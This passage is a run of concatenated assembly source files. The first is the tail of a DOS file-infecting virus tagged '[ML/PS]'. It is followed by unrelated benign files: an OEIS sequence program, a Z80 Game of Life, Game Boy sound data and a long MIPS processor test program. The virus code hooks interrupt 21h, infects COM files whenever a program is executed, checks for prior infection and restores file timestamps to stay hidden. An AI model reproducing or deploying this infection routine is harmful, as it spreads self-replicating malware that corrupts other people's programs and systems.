;Modify Interrupt Table mov word ptr es:[i021hOffset+0E0h],ax ; To Point To Virus's ; Interrupt 021h mov ax,es ; Handler. ; xchg ax,word ptr es:[086h] ; mov word ptr es:[i021hSegment+0E0h],ax ; ; restoreCOMbytes: ; push cs cs ;Equal Out Segment pop ds es ; Registers. ; lea si,[bp+host_bytes] ;SI = Host's Bytes mov di,100h ;DI = Start of Host push di ;Save DI onto Stack mov byte ptr [di],0C3h ;Write RET to Host call di ;Call 100h (RET) ; movsb ;Byte @ DS:[SI]=>ES:[DI] movsw ;Word @ DS:[SI]=>ES:[DI] ; retn ;Return to Host Program. ; host_bytes db 0CDh,020h,000h ;Buffer For Starting of ; Host Program. infect: xor bp,bp ;Load Register w/Zero ; mov ax,3D00h ;AX = 3D00h int 021h ;Open File in R/O Mode. ; xchg ax,bx ; ; push bx cs cs ;Save Handle, Equal Out pop ds es ; Segment Registers. ; mov ax,1220h ;AX = 1220h int 02Fh ;Get JFT. ; mov ax,1216h ;AX = 1216h mov bl,byte ptr es:[di] ;BL = Location of SFT int 02Fh ;Get SFT. ; pop bx ;Restore File Handle ; mov word ptr es:[di+002h],002h ;Open File For Read And ; Write Mode. mov ah,03Fh ;AH = 3Fh mov cx,003h ;CX = # of Bytes To Read mov dx,offset host_bytes+0E0h ;DX = Buffer + Offset int 021h ;Read 003h Bytes To Bufr ; mov si,dx ;SI = DX ; cmp word ptr [si+000h],5A4Dh ;EXE File? jz closeCOMfile ;Exit Virus ; cmp word ptr [si+000h],4D5Ah ;EXE File? jz closeCOMfile ;Exit Virus ; push cx ;Save CX onto Stack. ; mov ax,4202h ;AX = 4202h xor cx,cx ;Load Register w/Zero cwd ;Load Register w/Zero int 021h ;Move File Pointer @ EOF ; pop cx ;Restore CX. ; mov word ptr [delta+0E0h],ax ;Write Delta Offset ; sub ax,cx ;Subtract 3h from Size. mov byte ptr [temp_buffer+0E0h+000h],0E9h ;Write Jump to Buffer mov word ptr [temp_buffer+0E0h+001h],ax ;Write Location to Buffr ; sub ax,(v_end-v_start) ;Subtract Virus Length ; cmp word ptr [si+001h],ax ;Is File Infected? jz closeCOMfile ;Jump if Infected. ; mov ah,040h ;AH = 40h mov cx,(v_end-v_start) ;CX = # of Bytes to Wrte mov dx,01E0h ;DX = Data to Write int 021h ;Write To File. ; mov word ptr es:[di+015h],bp ;Move File Pointer To mov word ptr es:[di+017h],bp ;Start of File. ; mov ah,040h ;AH = 40h mov cx,003h ;CX = # of Bytes to Wrte mov dx,offset temp_buffer+0E0h ;DX = Data to Write int 021h ;Write To File. ; mov ax,5701h ;AX = 5701h mov cx,word ptr es:[di+00Dh] ;CX = Time Stamp mov dx,word ptr es:[di+00Fh] ;DX = Date Stamp int 021h ;Set Time. ; closeCOMfile: ; mov ah,03Eh ;AH = 3Eh int 021h ;Close File. ; jmp exit ;Unconditional Jump ; db "[ML/PS]" ; ; i021h: pusha ;Preserve All Regs. push ds es ;Save Segment Registers. ; sub ax,4B00h ;Executing A File? jnz exit ;Jump If Not 4B00h. ; jmp infect ;Unconditional Jump. exit: pop es ds ;Restore Segment Regs. popa ;Restore All Registers. ; int21h: db 0EAh ;JMP SSSS:OOOOO ; v_end: ;End of Virus heap_start: ;Start of Heap ; i021hOffset dw 001h dup (?) ;Buffer for Offset i021hSegment dw 001h dup (?) ;Buffer for Segment temp_buffer db 003h dup (?) ;Buffer for Calculations ; heap_end: ;End of Heap ; end start ;End of Source

oeis/051/A051536.asm

neoneye/loda-programs

11

15501

; A051536: a(n) = least common multiple of {1, 4, 7, 10, 13 ..., 3n+1} (A016777). ; Submitted by <NAME> ; 1,4,28,140,1820,7280,138320,1521520,7607600,7607600,235835600,4009205200,148340592400,148340592400,6378645473200,146708845883600,1026961921185200,1026961921185200,1026961921185200,29781895714370800,1816695638576618800,7266782554306475200,486874431138533838400,486874431138533838400,35541833473112970203200,35541833473112970203200,2807804844375924646052800,115119998619412910488164800,115119998619412910488164800,115119998619412910488164800,115119998619412910488164800,5410639935112406792943745600 mov $1,1 mov $2,1 lpb $0 mov $3,$2 add $2,2 lpb $3 add $2,1 mov $4,$1 gcd $4,$2 div $1,$4 mov $3,$5 lpe sub $0,1 mul $1,$2 lpe mov $0,$1

life.asm

ncot-tech/z80-life

9

86676

OUTPUT life.z80 ORG $8000 ; Defines ScreenWidth EQU 80 ScreenHeight EQU 25 ScreenSize EQU ScreenWidth*ScreenHeight DeadChar EQU $20 AliveChar EQU $40 call printBoard main: call calcCells call swapScreen call printBoard ;call printBoardNeighbourCount ; loop jp main ret printBoard: call cls ld de,boardTop call printStr call printNl ld a,'|' call printChr ld de,0 ld b,0 printLoop: ld hl,(currentGrid) add hl,de ld a,(hl) cp 1 jp nz, printDeadCell ld a,AliveChar call printChr jp printCharDone printDeadCell: ld a,DeadChar call printChr printCharDone: inc de inc b ld hl,ScreenSize ; this is a constant or a sbc hl,de add hl,de jp z,printLoopDone ld a,ScreenWidth cp b jp nz,printLoop ld a,'|' call printChr call printNl ld a,'|' call printChr ld b,0 jp printLoop printLoopDone: ld a,'|' call printChr call printNl ld de,boardBottom call printStr ret ; This works, stop debugging it swapScreen: ld hl,(currentGrid) ld de,(otherGrid) ld (otherGrid),hl ld (currentGrid),de ret include debugging.asm include board2.asm include utils.asm include ansi.asm include data.asm end:

audio/sfx/cry21_1.asm

adhi-thirumala/EvoYellow

16

94573

SFX_Cry21_1_Ch1: dutycycle 27 unknownsfx0x20 3, 243, 100, 5 unknownsfx0x20 2, 226, 68, 5 unknownsfx0x20 5, 209, 34, 5 unknownsfx0x20 2, 178, 132, 4 unknownsfx0x20 8, 209, 162, 4 unknownsfx0x20 3, 243, 36, 5 unknownsfx0x20 4, 228, 228, 4 unknownsfx0x20 8, 209, 2, 5 endchannel SFX_Cry21_1_Ch2: dutycycle 204 unknownsfx0x20 3, 211, 96, 5 unknownsfx0x20 2, 194, 64, 5 unknownsfx0x20 5, 193, 32, 5 unknownsfx0x20 2, 146, 128, 4 unknownsfx0x20 8, 193, 160, 4 unknownsfx0x20 3, 211, 32, 5 unknownsfx0x20 3, 196, 224, 4 unknownsfx0x20 8, 193, 0, 5 SFX_Cry21_1_Ch3: endchannel

P6/P6Judger - 100 testpoints/testpoint/testpoint27.asm

flyinglandlord/BUAA-CO-2021

5

1151

ori $1, $0, 6 ori $2, $0, 8 ori $3, $0, 6 ori $4, $0, 9 sw $2, 0($0) sw $4, 4($0) sw $4, 8($0) sw $3, 12($0) sw $3, 16($0) sw $4, 20($0) sw $2, 24($0) sw $4, 28($0) sw $2, 32($0) sw $3, 36($0) sw $3, 40($0) sw $2, 44($0) sw $3, 48($0) sw $3, 52($0) sw $4, 56($0) sw $3, 60($0) sw $2, 64($0) sw $1, 68($0) sw $2, 72($0) sw $2, 76($0) sw $3, 80($0) sw $3, 84($0) sw $3, 88($0) sw $4, 92($0) sw $1, 96($0) sw $2, 100($0) sw $3, 104($0) sw $1, 108($0) sw $4, 112($0) sw $2, 116($0) sw $4, 120($0) sw $4, 124($0) beq $2, $2, TAG1 sh $2, 0($2) bgtz $2, TAG1 mtlo $2 TAG1: lw $1, 0($2) beq $2, $1, TAG2 mfhi $1 bne $1, $2, TAG2 TAG2: add $2, $1, $1 lb $1, 0($2) xori $4, $2, 7 sltiu $1, $1, 8 TAG3: srl $1, $1, 13 mthi $1 lhu $1, 0($1) sltiu $3, $1, 1 TAG4: bgez $3, TAG5 mfhi $3 mtlo $3 sw $3, 0($3) TAG5: bne $3, $3, TAG6 mflo $1 lhu $1, 0($3) lui $1, 8 TAG6: multu $1, $1 sll $0, $0, 0 sll $0, $0, 0 lui $1, 10 TAG7: bne $1, $1, TAG8 sll $0, $0, 0 sll $0, $0, 0 lui $4, 9 TAG8: sll $0, $0, 0 multu $4, $4 sll $0, $0, 0 beq $4, $4, TAG9 TAG9: mflo $3 bltz $4, TAG10 xor $2, $3, $4 mflo $4 TAG10: bgtz $4, TAG11 lw $1, 0($4) mflo $3 mflo $2 TAG11: lui $3, 1 slt $1, $3, $3 mult $2, $1 mtlo $2 TAG12: mflo $4 sw $4, 0($1) srlv $3, $4, $1 mthi $3 TAG13: lh $1, 0($3) beq $3, $3, TAG14 sw $1, 0($3) mflo $2 TAG14: lui $1, 4 sltiu $2, $1, 4 lbu $2, 0($2) lui $3, 15 TAG15: mflo $3 sll $4, $3, 11 sb $3, 0($4) lb $4, 0($3) TAG16: addu $2, $4, $4 lui $1, 15 bgtz $2, TAG17 lui $4, 7 TAG17: mflo $3 bltz $4, TAG18 lui $3, 12 sll $0, $0, 0 TAG18: beq $3, $3, TAG19 lui $2, 15 multu $3, $3 sh $3, 0($2) TAG19: addu $1, $2, $2 mfhi $2 multu $2, $1 sh $1, 0($2) TAG20: lh $4, 0($2) multu $2, $4 beq $2, $4, TAG21 lbu $3, 0($2) TAG21: lui $1, 12 mflo $2 mfhi $1 blez $2, TAG22 TAG22: mflo $3 mflo $3 srav $1, $3, $3 mflo $3 TAG23: lw $3, 0($3) bgez $3, TAG24 mtlo $3 sltu $1, $3, $3 TAG24: beq $1, $1, TAG25 mult $1, $1 sltiu $3, $1, 8 addiu $3, $3, 10 TAG25: lbu $4, 0($3) addi $1, $3, 2 beq $1, $1, TAG26 srav $2, $3, $4 TAG26: sw $2, 0($2) mflo $3 multu $3, $2 slti $4, $3, 2 TAG27: mtlo $4 beq $4, $4, TAG28 mult $4, $4 bgez $4, TAG28 TAG28: lb $1, 0($4) sb $1, 0($4) sb $1, 0($4) beq $1, $1, TAG29 TAG29: sw $1, 0($1) bltz $1, TAG30 srav $3, $1, $1 andi $4, $3, 12 TAG30: lh $4, 0($4) multu $4, $4 mult $4, $4 sw $4, 0($4) TAG31: add $1, $4, $4 srlv $4, $1, $4 sh $4, 0($4) mult $4, $4 TAG32: beq $4, $4, TAG33 sh $4, 0($4) multu $4, $4 mult $4, $4 TAG33: mfhi $1 mthi $1 lui $1, 5 blez $4, TAG34 TAG34: div $1, $1 lui $3, 2 mfhi $3 multu $3, $3 TAG35: beq $3, $3, TAG36 lw $4, 0($3) mtlo $4 bne $4, $3, TAG36 TAG36: sra $3, $4, 1 lui $4, 15 mtlo $4 beq $4, $4, TAG37 TAG37: sra $1, $4, 1 addu $3, $1, $4 mfhi $4 sw $4, 0($4) TAG38: blez $4, TAG39 sll $1, $4, 14 lh $3, 0($4) mtlo $3 TAG39: sll $2, $3, 2 bne $3, $3, TAG40 multu $3, $2 sll $0, $0, 0 TAG40: mtlo $2 sll $0, $0, 0 subu $1, $2, $2 mflo $1 TAG41: sll $0, $0, 0 lui $1, 15 sll $0, $0, 0 or $4, $1, $1 TAG42: addu $4, $4, $4 div $4, $4 bgez $4, TAG43 sll $0, $0, 0 TAG43: bltz $4, TAG44 mtlo $4 lui $4, 15 mtlo $4 TAG44: addiu $4, $4, 14 sll $0, $0, 0 addu $2, $4, $4 beq $2, $4, TAG45 TAG45: xori $3, $2, 3 sll $0, $0, 0 mtlo $2 mflo $2 TAG46: sll $0, $0, 0 lui $2, 0 bltz $3, TAG47 sw $3, 0($2) TAG47: mflo $3 lui $3, 7 lui $4, 0 sll $0, $0, 0 TAG48: blez $4, TAG49 mult $4, $4 mthi $4 beq $4, $4, TAG49 TAG49: lui $3, 0 lui $2, 14 multu $4, $4 srlv $1, $2, $2 TAG50: subu $4, $1, $1 bne $4, $4, TAG51 xori $1, $4, 9 sltiu $3, $4, 7 TAG51: lbu $3, 0($3) multu $3, $3 blez $3, TAG52 mflo $1 TAG52: sw $1, 0($1) mthi $1 mflo $3 sra $4, $1, 3 TAG53: multu $4, $4 mult $4, $4 mthi $4 bne $4, $4, TAG54 TAG54: mtlo $4 lui $3, 11 sll $0, $0, 0 mflo $2 TAG55: mult $2, $2 blez $2, TAG56 andi $2, $2, 11 mfhi $4 TAG56: blez $4, TAG57 lui $3, 0 mthi $4 bne $4, $3, TAG57 TAG57: mfhi $3 lbu $2, 0($3) lui $1, 6 bne $2, $1, TAG58 TAG58: sll $0, $0, 0 lh $2, 0($2) addiu $1, $2, 12 mult $2, $2 TAG59: subu $4, $1, $1 addi $4, $4, 10 srav $4, $4, $4 sw $4, 0($4) TAG60: bgtz $4, TAG61 srav $3, $4, $4 bne $3, $3, TAG61 lui $1, 2 TAG61: mflo $1 bgtz $1, TAG62 mult $1, $1 multu $1, $1 TAG62: lui $1, 10 addiu $2, $1, 8 sll $0, $0, 0 sll $0, $0, 0 TAG63: bltz $2, TAG64 sllv $3, $2, $2 sll $0, $0, 0 sll $0, $0, 0 TAG64: beq $2, $2, TAG65 mtlo $2 mflo $4 sh $2, 0($2) TAG65: xor $1, $4, $4 lui $2, 7 sll $0, $0, 0 srl $1, $4, 14 TAG66: sh $1, 0($1) mult $1, $1 lui $1, 15 div $1, $1 TAG67: mflo $1 mflo $2 mfhi $2 mfhi $2 TAG68: bne $2, $2, TAG69 mtlo $2 mflo $2 beq $2, $2, TAG69 TAG69: andi $1, $2, 13 mthi $2 lui $4, 4 bgez $2, TAG70 TAG70: lui $1, 15 slt $4, $1, $1 xor $2, $4, $4 sll $0, $0, 0 TAG71: multu $2, $2 beq $2, $2, TAG72 lui $2, 10 sltu $3, $2, $2 TAG72: bgtz $3, TAG73 xor $3, $3, $3 lbu $1, 0($3) bgez $1, TAG73 TAG73: divu $1, $1 bne $1, $1, TAG74 mtlo $1 bne $1, $1, TAG74 TAG74: mflo $2 addu $1, $2, $2 slt $1, $2, $1 lui $3, 13 TAG75: mthi $3 div $3, $3 addu $4, $3, $3 lui $3, 2 TAG76: sll $0, $0, 0 divu $3, $3 lui $3, 0 blez $3, TAG77 TAG77: lb $3, 0($3) beq $3, $3, TAG78 sra $2, $3, 7 sb $2, 0($2) TAG78: sh $2, 0($2) lui $2, 9 sll $0, $0, 0 sll $0, $0, 0 TAG79: div $2, $2 mfhi $3 beq $3, $2, TAG80 sb $3, 0($3) TAG80: blez $3, TAG81 mflo $1 multu $3, $1 mult $3, $1 TAG81: div $1, $1 lui $2, 15 addu $3, $1, $1 bltz $2, TAG82 TAG82: sra $4, $3, 10 bltz $3, TAG83 sll $3, $3, 12 srav $2, $3, $3 TAG83: mtlo $2 addiu $3, $2, 6 mflo $2 andi $4, $3, 2 TAG84: mflo $4 mtlo $4 lui $3, 10 bne $4, $4, TAG85 TAG85: sll $0, $0, 0 mult $3, $3 nor $2, $3, $3 sll $0, $0, 0 TAG86: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 TAG87: addu $2, $2, $2 lui $1, 13 sll $0, $0, 0 sll $0, $0, 0 TAG88: sll $0, $0, 0 sll $0, $0, 0 sltiu $2, $1, 14 xori $2, $1, 2 TAG89: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 beq $2, $2, TAG90 TAG90: sll $0, $0, 0 mflo $4 bne $2, $4, TAG91 sll $0, $0, 0 TAG91: bgtz $4, TAG92 multu $4, $4 blez $4, TAG92 and $3, $4, $4 TAG92: lb $1, 0($3) lui $4, 13 mfhi $1 lui $4, 8 TAG93: div $4, $4 sll $0, $0, 0 bne $4, $4, TAG94 mflo $1 TAG94: divu $1, $1 sb $1, 0($1) beq $1, $1, TAG95 lb $1, 0($1) TAG95: bltz $1, TAG96 sb $1, 0($1) lbu $4, 0($1) bne $4, $1, TAG96 TAG96: lui $3, 14 beq $4, $4, TAG97 lui $4, 3 sllv $1, $4, $4 TAG97: lbu $1, 0($1) lb $1, 0($1) mthi $1 subu $4, $1, $1 TAG98: lui $1, 9 lhu $1, 0($4) mfhi $3 lw $2, 0($4) TAG99: beq $2, $2, TAG100 divu $2, $2 lui $4, 0 slt $2, $2, $2 TAG100: mthi $2 slti $4, $2, 6 sw $2, 0($4) beq $2, $4, TAG101 TAG101: xori $2, $4, 13 multu $2, $4 multu $2, $4 lh $4, 0($4) TAG102: bne $4, $4, TAG103 lui $3, 4 sll $0, $0, 0 sb $3, -256($4) TAG103: multu $3, $3 subu $4, $3, $3 divu $4, $3 sb $4, 0($4) TAG104: addiu $2, $4, 9 lbu $2, 0($4) slti $1, $2, 8 div $2, $1 TAG105: lui $1, 3 addu $1, $1, $1 nor $1, $1, $1 sltiu $2, $1, 13 TAG106: ori $2, $2, 13 bgez $2, TAG107 divu $2, $2 or $1, $2, $2 TAG107: mfhi $4 bne $1, $1, TAG108 mtlo $1 sll $1, $1, 9 TAG108: div $1, $1 addiu $3, $1, 0 multu $3, $3 bne $3, $1, TAG109 TAG109: sll $0, $0, 0 sll $0, $0, 0 multu $3, $3 lui $2, 15 TAG110: mthi $2 sll $0, $0, 0 sll $0, $0, 0 sltiu $2, $2, 5 TAG111: beq $2, $2, TAG112 mflo $2 divu $2, $2 bne $2, $2, TAG112 TAG112: sll $0, $0, 0 xori $2, $2, 13 mthi $2 multu $4, $4 TAG113: lui $1, 6 sll $0, $0, 0 mthi $1 sllv $1, $1, $1 TAG114: lui $3, 9 mtlo $1 sll $0, $0, 0 bgtz $4, TAG115 TAG115: lui $2, 11 lhu $2, 0($4) divu $2, $2 mthi $4 TAG116: sw $2, -256($2) addu $1, $2, $2 xori $3, $2, 4 beq $2, $3, TAG117 TAG117: sltiu $4, $3, 11 slti $3, $4, 7 sb $3, 0($3) lb $1, 0($3) TAG118: sltiu $3, $1, 14 mthi $3 lbu $3, 0($1) bne $1, $3, TAG119 TAG119: mthi $3 lui $3, 15 subu $2, $3, $3 sltiu $4, $3, 9 TAG120: bgez $4, TAG121 lhu $2, 0($4) sb $2, 0($4) mthi $4 TAG121: andi $4, $2, 12 mfhi $2 sltu $4, $4, $2 mfhi $1 TAG122: sb $1, 0($1) mtlo $1 sb $1, 0($1) slti $2, $1, 7 TAG123: bne $2, $2, TAG124 mflo $4 lb $4, 0($2) sb $4, 0($4) TAG124: lui $4, 13 sll $0, $0, 0 sll $2, $4, 7 multu $4, $4 TAG125: sll $0, $0, 0 divu $2, $2 mfhi $1 sra $2, $1, 9 TAG126: sh $2, 0($2) lui $1, 8 srl $1, $1, 12 bgez $2, TAG127 TAG127: mtlo $1 mflo $1 sb $1, 0($1) bltz $1, TAG128 TAG128: mtlo $1 lw $1, 0($1) mtlo $1 addu $2, $1, $1 TAG129: bltz $2, TAG130 mult $2, $2 bgtz $2, TAG130 sb $2, -256($2) TAG130: lui $1, 13 mflo $1 lui $3, 6 sll $0, $0, 0 TAG131: lui $1, 9 bne $1, $1, TAG132 sll $0, $0, 0 lui $3, 5 TAG132: slt $3, $3, $3 mflo $2 bne $3, $2, TAG133 sw $2, 0($3) TAG133: mtlo $2 mflo $4 mflo $4 sll $0, $0, 0 TAG134: sll $0, $0, 0 beq $4, $4, TAG135 mthi $4 mthi $4 TAG135: mfhi $1 bne $4, $1, TAG136 mthi $1 mtlo $1 TAG136: beq $1, $1, TAG137 sll $0, $0, 0 mtlo $2 divu $1, $1 TAG137: sll $0, $0, 0 mthi $2 beq $2, $2, TAG138 sll $0, $0, 0 TAG138: sll $0, $0, 0 bgez $1, TAG139 lui $1, 11 addiu $4, $1, 14 TAG139: sll $0, $0, 0 andi $2, $1, 12 and $2, $2, $4 multu $2, $2 TAG140: mthi $2 sb $2, 0($2) mtlo $2 multu $2, $2 TAG141: bne $2, $2, TAG142 lhu $3, 0($2) lui $2, 1 blez $3, TAG142 TAG142: sltiu $2, $2, 11 subu $2, $2, $2 bgez $2, TAG143 add $2, $2, $2 TAG143: bne $2, $2, TAG144 lw $4, 0($2) blez $2, TAG144 mflo $3 TAG144: bne $3, $3, TAG145 sw $3, 0($3) mfhi $4 lui $1, 0 TAG145: mthi $1 bne $1, $1, TAG146 lui $1, 0 multu $1, $1 TAG146: mflo $3 blez $3, TAG147 sb $1, 0($3) mfhi $4 TAG147: blez $4, TAG148 mult $4, $4 mult $4, $4 mflo $1 TAG148: beq $1, $1, TAG149 mthi $1 beq $1, $1, TAG149 lui $1, 14 TAG149: sra $2, $1, 1 bgez $2, TAG150 mtlo $2 beq $2, $2, TAG150 TAG150: mult $2, $2 mflo $3 mfhi $4 lui $2, 1 TAG151: beq $2, $2, TAG152 sll $0, $0, 0 subu $4, $2, $2 sub $4, $4, $4 TAG152: mfhi $2 blez $2, TAG153 lui $3, 11 mfhi $3 TAG153: multu $3, $3 lui $1, 5 mfhi $3 bgtz $3, TAG154 TAG154: lb $4, 0($3) beq $3, $3, TAG155 lw $2, 0($4) bgez $4, TAG155 TAG155: sw $2, 0($2) multu $2, $2 andi $3, $2, 13 bgtz $2, TAG156 TAG156: xor $1, $3, $3 mflo $3 bltz $3, TAG157 mthi $1 TAG157: sb $3, 0($3) sltiu $1, $3, 14 mflo $1 bgtz $1, TAG158 TAG158: multu $1, $1 beq $1, $1, TAG159 srlv $3, $1, $1 lw $2, 0($3) TAG159: mthi $2 mtlo $2 sll $1, $2, 13 mflo $3 TAG160: bne $3, $3, TAG161 lui $1, 11 mthi $3 lui $2, 8 TAG161: or $2, $2, $2 beq $2, $2, TAG162 divu $2, $2 beq $2, $2, TAG162 TAG162: nor $4, $2, $2 mtlo $2 mthi $4 mult $2, $2 TAG163: beq $4, $4, TAG164 sltu $3, $4, $4 sw $3, 0($4) div $4, $3 TAG164: mult $3, $3 bltz $3, TAG165 mthi $3 lui $3, 10 TAG165: mtlo $3 sll $0, $0, 0 bgez $3, TAG166 sll $0, $0, 0 TAG166: beq $3, $3, TAG167 sll $0, $0, 0 lui $1, 12 sra $2, $3, 11 TAG167: mtlo $2 multu $2, $2 sll $0, $0, 0 blez $2, TAG168 TAG168: multu $1, $1 bne $1, $1, TAG169 or $1, $1, $1 multu $1, $1 TAG169: sll $0, $0, 0 mult $1, $1 sltu $1, $3, $1 sll $4, $1, 15 TAG170: mfhi $4 sltiu $4, $4, 6 xor $4, $4, $4 or $4, $4, $4 TAG171: slti $4, $4, 0 bgez $4, TAG172 multu $4, $4 bne $4, $4, TAG172 TAG172: mthi $4 mflo $3 lui $1, 12 mult $4, $3 TAG173: bgez $1, TAG174 lui $3, 12 bgez $1, TAG174 div $3, $3 TAG174: subu $4, $3, $3 bne $4, $4, TAG175 mtlo $3 lui $4, 6 TAG175: blez $4, TAG176 lui $2, 12 lui $2, 0 sw $4, 0($2) TAG176: mtlo $2 sw $2, 0($2) lbu $1, 0($2) mtlo $2 TAG177: mtlo $1 mult $1, $1 lui $2, 15 sub $4, $1, $1 TAG178: beq $4, $4, TAG179 lui $2, 7 lhu $4, 0($4) sw $4, 0($4) TAG179: subu $2, $4, $4 mflo $1 bltz $4, TAG180 lh $3, 0($2) TAG180: multu $3, $3 mflo $2 sra $2, $2, 1 lw $3, 0($3) TAG181: sll $4, $3, 3 srl $1, $4, 12 sltu $4, $1, $4 sh $4, 0($1) TAG182: mflo $1 lw $2, 0($1) mfhi $3 mflo $2 TAG183: multu $2, $2 multu $2, $2 bne $2, $2, TAG184 andi $4, $2, 7 TAG184: sltiu $2, $4, 8 mflo $4 multu $2, $2 mult $2, $4 TAG185: addiu $2, $4, 2 lhu $1, 0($4) addiu $2, $2, 11 bgtz $2, TAG186 TAG186: mthi $2 sra $4, $2, 5 and $4, $2, $2 bne $2, $4, TAG187 TAG187: sll $4, $4, 0 lui $1, 1 andi $2, $1, 6 sll $0, $0, 0 TAG188: bne $3, $3, TAG189 mflo $4 mflo $4 mtlo $3 TAG189: sra $2, $4, 9 multu $2, $2 sll $1, $2, 1 mflo $4 TAG190: addu $3, $4, $4 sh $3, 0($4) or $2, $3, $3 lui $1, 4 TAG191: or $3, $1, $1 bne $1, $1, TAG192 mflo $4 lui $3, 14 TAG192: sll $0, $0, 0 srlv $3, $3, $3 slti $2, $3, 5 and $4, $3, $4 TAG193: bne $4, $4, TAG194 mult $4, $4 srav $1, $4, $4 mflo $1 TAG194: mthi $1 sb $1, 0($1) bltz $1, TAG195 sh $1, 0($1) TAG195: sb $1, 0($1) bgez $1, TAG196 andi $2, $1, 11 nor $2, $2, $2 TAG196: bgez $2, TAG197 mfhi $1 beq $1, $1, TAG197 sb $2, 0($2) TAG197: subu $3, $1, $1 lb $3, 0($3) mflo $1 addu $1, $3, $3 TAG198: bne $1, $1, TAG199 mfhi $1 srlv $3, $1, $1 bne $1, $1, TAG199 TAG199: mult $3, $3 ori $3, $3, 2 bgtz $3, TAG200 lui $3, 7 TAG200: bne $3, $3, TAG201 mflo $4 mtlo $3 bne $3, $3, TAG201 TAG201: andi $3, $4, 8 mult $4, $4 multu $4, $4 sltiu $4, $3, 9 TAG202: lbu $1, 0($4) lui $3, 11 mthi $1 lbu $1, 0($4) TAG203: lui $3, 7 sll $0, $0, 0 mult $1, $1 beq $1, $3, TAG204 TAG204: mult $3, $3 bgez $3, TAG205 lui $3, 11 beq $3, $3, TAG205 TAG205: lui $1, 14 multu $1, $1 sll $0, $0, 0 mthi $3 TAG206: bgez $4, TAG207 mflo $3 bne $4, $4, TAG207 and $3, $3, $4 TAG207: lw $3, 0($3) mthi $3 mflo $2 ori $1, $3, 15 TAG208: lb $2, 0($1) sll $2, $2, 14 multu $2, $2 mtlo $2 TAG209: mflo $2 beq $2, $2, TAG210 lui $3, 10 add $3, $3, $3 TAG210: lui $2, 11 xor $1, $3, $2 bgtz $3, TAG211 multu $3, $1 TAG211: sll $0, $0, 0 sra $4, $1, 11 lui $3, 3 slti $3, $1, 8 TAG212: bgtz $3, TAG213 lb $1, 0($3) multu $3, $1 bltz $3, TAG213 TAG213: lb $3, 0($1) bgtz $1, TAG214 andi $3, $3, 4 multu $3, $1 TAG214: mfhi $3 lbu $3, 0($3) mfhi $3 sw $3, 0($3) TAG215: lui $2, 14 bgez $3, TAG216 sll $0, $0, 0 lui $1, 10 TAG216: bgez $1, TAG217 sltiu $2, $1, 12 divu $2, $1 mult $1, $1 TAG217: beq $2, $2, TAG218 sllv $2, $2, $2 mflo $1 mult $1, $2 TAG218: mfhi $3 sh $1, 0($1) srav $2, $1, $3 bgtz $2, TAG219 TAG219: mflo $2 sh $2, 0($2) srlv $4, $2, $2 mflo $3 TAG220: lui $3, 7 sllv $4, $3, $3 or $4, $3, $3 mflo $2 TAG221: mfhi $3 lw $1, 0($2) sh $2, 0($3) lb $2, 0($1) TAG222: lb $1, 0($2) addiu $2, $2, 9 srav $3, $2, $1 div $2, $3 TAG223: mfhi $2 mflo $2 bltz $2, TAG224 lui $2, 12 TAG224: sll $0, $0, 0 mfhi $2 multu $2, $2 mthi $2 TAG225: bgez $2, TAG226 lui $1, 3 multu $2, $1 beq $1, $2, TAG226 TAG226: sll $0, $0, 0 sll $0, $0, 0 lbu $2, 0($3) bne $3, $3, TAG227 TAG227: mfhi $1 xori $1, $2, 14 andi $1, $2, 15 and $3, $1, $1 TAG228: mfhi $1 lui $1, 7 mfhi $3 lhu $2, 0($3) TAG229: sh $2, 0($2) mthi $2 subu $3, $2, $2 lui $2, 10 TAG230: bgez $2, TAG231 sll $0, $0, 0 mtlo $2 bne $2, $2, TAG231 TAG231: mflo $4 mtlo $4 mtlo $2 mult $2, $4 TAG232: mthi $4 mult $4, $4 mthi $4 lui $3, 10 TAG233: sltiu $2, $3, 11 beq $2, $3, TAG234 lui $3, 5 sw $3, 0($2) TAG234: mfhi $2 lb $2, 0($2) lui $4, 13 lui $1, 4 TAG235: beq $1, $1, TAG236 sll $0, $0, 0 bgtz $1, TAG236 mtlo $4 TAG236: sll $0, $0, 0 bne $4, $4, TAG237 multu $4, $4 mthi $4 TAG237: lui $3, 7 srlv $2, $4, $4 sll $0, $0, 0 mflo $4 TAG238: mtlo $4 mthi $4 lui $4, 12 div $4, $4 TAG239: mthi $4 sll $0, $0, 0 mfhi $3 divu $4, $3 TAG240: or $1, $3, $3 slti $3, $3, 6 bgez $1, TAG241 mfhi $1 TAG241: bltz $1, TAG242 sub $4, $1, $1 lui $3, 2 bltz $4, TAG242 TAG242: subu $1, $3, $3 lui $3, 9 addiu $2, $3, 7 sb $1, 0($1) TAG243: divu $2, $2 mtlo $2 mtlo $2 srlv $2, $2, $2 TAG244: lui $1, 8 addiu $4, $1, 8 slt $4, $2, $2 mfhi $1 TAG245: bne $1, $1, TAG246 slti $4, $1, 10 sllv $4, $4, $1 sll $4, $4, 11 TAG246: sh $4, -2048($4) lui $1, 2 and $2, $1, $4 sltiu $2, $1, 15 TAG247: bltz $2, TAG248 lh $3, 0($2) addiu $4, $3, 11 subu $4, $2, $2 TAG248: addu $2, $4, $4 mthi $2 sb $2, 0($4) lb $1, 0($2) TAG249: lui $1, 11 multu $1, $1 bgez $1, TAG250 lui $1, 6 TAG250: or $3, $1, $1 bgtz $1, TAG251 sll $0, $0, 0 bgtz $3, TAG251 TAG251: multu $4, $4 sh $4, 0($4) bgez $4, TAG252 mfhi $4 TAG252: lhu $4, 0($4) bne $4, $4, TAG253 mflo $2 mult $4, $2 TAG253: mflo $4 lhu $4, 0($2) mthi $4 blez $2, TAG254 TAG254: slti $4, $4, 6 lbu $3, 0($4) mthi $4 slti $3, $4, 7 TAG255: bltz $3, TAG256 div $3, $3 sra $1, $3, 11 lui $3, 14 TAG256: sll $0, $0, 0 sll $0, $0, 0 mflo $2 mtlo $2 TAG257: sb $2, 0($2) sb $2, 0($2) bgez $2, TAG258 andi $4, $2, 0 TAG258: mthi $4 blez $4, TAG259 sw $4, 0($4) sh $4, 0($4) TAG259: multu $4, $4 lui $3, 6 bgtz $4, TAG260 lhu $4, 0($4) TAG260: subu $3, $4, $4 lui $2, 12 lbu $2, 0($3) lui $1, 8 TAG261: sllv $4, $1, $1 mflo $3 sll $0, $0, 0 mtlo $3 TAG262: mthi $3 multu $3, $3 or $1, $3, $3 mfhi $1 TAG263: bne $1, $1, TAG264 sh $1, 0($1) lb $1, 0($1) sh $1, 0($1) TAG264: sb $1, 0($1) lw $3, 0($1) srl $4, $3, 10 